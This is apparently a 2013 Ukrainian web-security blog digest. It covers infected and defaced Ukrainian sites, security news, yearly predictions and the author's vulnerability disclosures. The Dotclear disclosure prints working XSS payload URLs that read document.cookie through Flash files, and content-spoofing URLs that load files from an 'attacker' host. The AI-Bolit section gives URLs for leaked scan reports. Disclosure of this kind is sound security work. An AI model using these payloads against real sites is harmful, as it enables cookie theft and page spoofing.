Websecurity - Веб безпека

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://turizm.zp.ua - інфекція була виявлена 08.04.2013. Зараз сайт входить до переліку підозрілих.
• http://albogroup.com - інфекція була виявлена 12.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://albogroup.com.ua - інфекція була виявлена 12.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://medbiz.com.ua - інфекція була виявлена 13.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://ukraine-today.net - інфекція була виявлена 16.04.2013. Зараз сайт не входить до переліку підозрілих.

Виявлені слабкі дозволи в Microsoft SharePoint.

Уразливі версії: Microsoft SharePoint Server 2013.

Слабкі права доступу до документів.

• Microsoft Security Bulletin MS13-030 - Important Vulnerability in SharePoint Could Allow Information Disclosure (2827663) (деталі)

22.01.2013

У грудні, 02.12.2012, я виявив Brute Force та Information Leakage уразливості в секюріті додатку AI-Bolit. Про що вже повідомив розробникам веб додатку.

AI-Bolit — це скрипт для пошуку вірусів, троянів, бекдорів та іншої хакерської активності на хостингу.

Детальна інформація про уразливості з’явиться пізніше.

13.04.2013

Brute Force (WASC-11):

http://site/ai-bolit.php?p=1

Information Leakage (WASC-13):

http://site/AI-BOLIT-REPORT.html

http://site/AI-BOLIT-REPORT-<дата>-<час>.html

Витік звітів зі статистикою та FPD. В тому числі такі звіти заіндексовані пошуковими системами. Якщо в звіті показані виявлені на сайті бекдори, то отримавши доступ до звіту, можна дізнатися про бекдори і з їх використанням похакати сайт.

Уразливі всі версії AI-Bolit. У версії 20121014 формат імені файла був змінений (з доданням дати і часу), але його все ще легко підібрати, тому IL уразливість залишилась актуальною. Розробник програми пообіцяв виправити ці уразливості в нових версіях. У версії 20130201 було заборонене індексування звіту та в ім’я файла звіту додається випадкове число (для захисту від підбору імені).

За повідомленням www.xakep.ru, Microsoft уводить двохфакторну аутентифікацію.

Найближчим часом користувачі Microsoft Account одержать можливість активувати в налаштуваннях на сайті http://account.live.com нову опцію - двохфакторну аутентифікацію. Це означає, що доступ в аккаунт буде захищений не тільки паролем, але і додатковим одноразовим кодом, що буде приходити на телефон під час аутентифікації.

Google ввела двохфакторну аутентифікацію ще два роки тому, так само як це давно вже зробили інші компанії (в тому числі українські). І от нарешті Microsoft дійшла до цього.

За повідомленням www.opennet.ru, віджет соціальних мереж для WordPress виявився джерелом спама.

У плагині Social Media Widget для WordPress, з реалізацією віджета для вставки кнопок швидкого звернення до соціальних мереж, виявлена наявність шкідливого коду для підстановки спаму. Погіршує ситуацію те, що плагін користається великою популярністю і був завантажений більше 900 тисяч разів. В даний час плагін уже вилучений з каталогу WordPress, а всім користувачам дана рекомендація негайного відключення даного плагіна у своїх системах.

Торік в своїй статті Включення бекдорів у веб додатки я писав про основні шляхи потрапляння бекдору у веб додатки та численні приклади популярних веб додатків в яких були виявленні бекдори (серед них був і WordPress). Я досліджую цю тему на протязі багатьох років. І з моєї статті випливало, що в будь-який веб додаток, в тому числі плагіни, можуть потрапити бекдори. І цей випадок з плагіном для WP наявне цьому підтвердження.

За повідомленням www.xakep.ru, SQL ін’єкції - головна зброя армії скрипт-кідді.

У квітні 2013 року компанія Veracode опублікувала черговий щорічний звіт State of Software Security із тенденціями і статистикою в області інтернет безпеки. Компанія дуже докладно досліджує найбільш розповсюджені уразливості веб додатків, а також загальні тенденції на ринку інтернет безпеки.

Ключові тенденції 2013 року від Veracode: Збільшення кількості “повсякденних” хакерів (скрипт-кідді), Зростання попиту на професіоналів в області ІТ-безпеки, Проблеми з криптографією в додатках під Android (64%) та iOS (58%), Криптографічний захист комунікацій стане нормою.

В даній добірці експлоіти в веб додатках:

• TRENDNet IP Cam Authentication Bypass Vulnerability (деталі)
• Ruby Gem kelredd-pruview 0.3.8 Command Injection Vulnerability (деталі)
• Nagios Remote Plugin Executor Arbitrary Command Execution (деталі)
• Netgear WNR1000 - Authentication Bypass (деталі)
• AOL Products downloadUpdater2 Firefox Plugin SRC Parameter Remote Code Execution (деталі)

10.01.2013

У листопаді, 13.11.2012, я виявив Cross-Site Scripting та Content Spoofing уразливості в Dotclear. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливість в Dotclear.

Детальна інформація про уразливості з’явиться пізніше.

12.04.2013

Cross-Site Scripting (WASC-08):

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)
http://site/inc/swf/player_flv.swf?configxml=http://site/attacker.xml
http://site/inc/swf/player_flv.swf?config=http://site/attacker.txt

Код виконається після кліку. Це strictly social XSS.

Content Spoofing (WASC-12):

http://site/inc/swf/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

Можна включати текст, зображення та html (наприклад, для link injection).

http://site/inc/swf/player_flv.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_flv.swf?config=http://attacker/1.txt
http://site/inc/swf/player_flv.swf?flv=http://attacker/1.flv
http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_mp3.swf?config=http://attacker/1.txt
http://site/inc/swf/player_mp3.swf?mp3=http://attacker/1.mp3

Уразливі Dotclear 2.4.4 (і частково 2.5) та попередні версії. В версії Dotclear 2.5 розробники виправили уразливості, але неефективно: по-перше, всі три вразливі флешки наявні в движку (тому з репозиторію чи з сайтів не слід їх брати для використання в своїх проектах, бо це вразливі версії флешек), по-друге, заборона прямого доступу до флешек (через .htaccess), щоб не можна було використати уразливості в них, працює лише на Apache, але не на інших веб серверах (тому сайти на них є вразливими).

Як і в попередні роки, надам свої прогнози розвитку веб безпеки в новому році. Але спочатку зроблю огляд тих прогнозів, що я давав на 2012 рік.

На початку минулого року я зробив свої прогнози стосовно розвитку галузі веб безпеки в минулому році. І зараз я оціню наскільки справдилися мої попередні прогнози.

1. Уразливості XSS в минулому році, як і раніше, все більше поширювалися (вони були найпоширенішими уразливостями веб додатків). Зокрема я оприлюднив уразливості у флешках, що розміщувалися на мільйонах сайтів.
2. Збільшилася кількість атак на державні сайти України - зростання взломів gov.ua-сайтів в 1,6 рази.
3. Активно знаходилися та використовувалися уразливості в браузерах (а також в плагінах, таких як Flash, Shockwave та Java) для атак на користувачів.
4. Збільшилася кількість DDoS-атак в Уанеті, в тому числі на державні сайти - зростання у 1,43 рази.
5. Значно зросла кількість заражених вірусами веб сторінок в Інтернеті. Зокрема в Уанеті в 2011 я виявив 233 інфікованих сайтів, а в 2012 вже 202 сайти (зменшення динаміки у 1,15 рази, але це я менше шукав інфіковані сайти, а насправді їх кількість зросла).
6. Збільшилися атаки на соціальні мережі, в тому числі на Twitter та були взломані LinkedIn та інші відомі сайти.
7. В Уанеті хакерська активність дещо впала порівняно з 2011 роком, зокрема в Уанеті спад на 19,5% (але то я менше досліджував, а насправді вона зросла).

Як видно всі мої попередні прогнози переважно збулися .

А тепер мій прогноз розвитку галузі веб безпеки в 2013 році.

1. Уразливостей у веб додатках буде знайдено набагато більше, ніж у інших додатках.
2. Збільшиться кількість атак на державні сайти України.
3. Зростання кількості заражених вірусами веб сторінок буде більш активним.
4. Все більше будуть використовуватися уразливості в браузерах та плагінах для атак на користувачів.
5. Втрати від кібершахрайства в Україні збільшаться.
6. Атаки на соціальні мережі та їхніх користувачів продовжать збільшуватися.
7. Продовжиться подальше зростання хакерської активності.

Продовжуючи розпочату традицію, після попереднього відео про ботнети: захоплення та керування, пропоную нове відео на веб секюріті тематику. Цього разу відео про захоплення мережі через руткіти для роутерів. Рекомендую подивитися всім хто цікавиться цією темою.

DEFCON 20: Owning the Network: Adventures in Router Rootkits

Торік на конференції DEFCON 20 відбувся виступ Michael Coppola. В своєму виступі він розповів про атаки на роутері, про створення руткітів для них та встановлення їх в роутери для контролю над пристроями. Що може використовуватися для створення ботнетів з мережевих пристроїв - про такі випадки я писав неодноразово.

Майкл розповів про різні аспекти теми руткітів для роутерів. Рекомендую подивитися дане відео для розуміння сучасних загроз в Інтернеті.

У березні, 26.03.2013, майже через півтора місяці після виходу Google Chrome 25, вийшов Google Chrome 26.

В браузері зроблено декілька нововведень та виправлені помилки. А також виправлено 11 уразливостей, з яких 2 позначені як небезпечні. Це менше ніж у попередній версії браузера.

Уразливості, що мають статус небезпечних, пов’язані зі звертанням до вже звільненої області пам’яті при роботі Web Audio і проблемами з обробкою ізольованих сайтів в окремому процесі.

• Увидел свет web-браузер Chrome 26 (деталі)

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.disgu.gov.ua (хакером Hmei7) - 29.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://che.gov.ua (хакером ZiqoR) - 03.02.2013 - похаканий державний сайт, зараз сайт взломаний Dr.SHA6H. Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті
• http://www.transavio.com.ua (хакером misafir) - 13.01.2013, зараз сайт вже виправлений адмінами
• http://www.blagfond-ch.com.ua (хакером Sejeal) - 21.01.2013, зараз сайт вже виправлений адмінами
• http://cafeneptun.com (хакерами з 3xp1r3 Cyber Army) - 09.04.2013, зараз сайт вже виправлений адмінами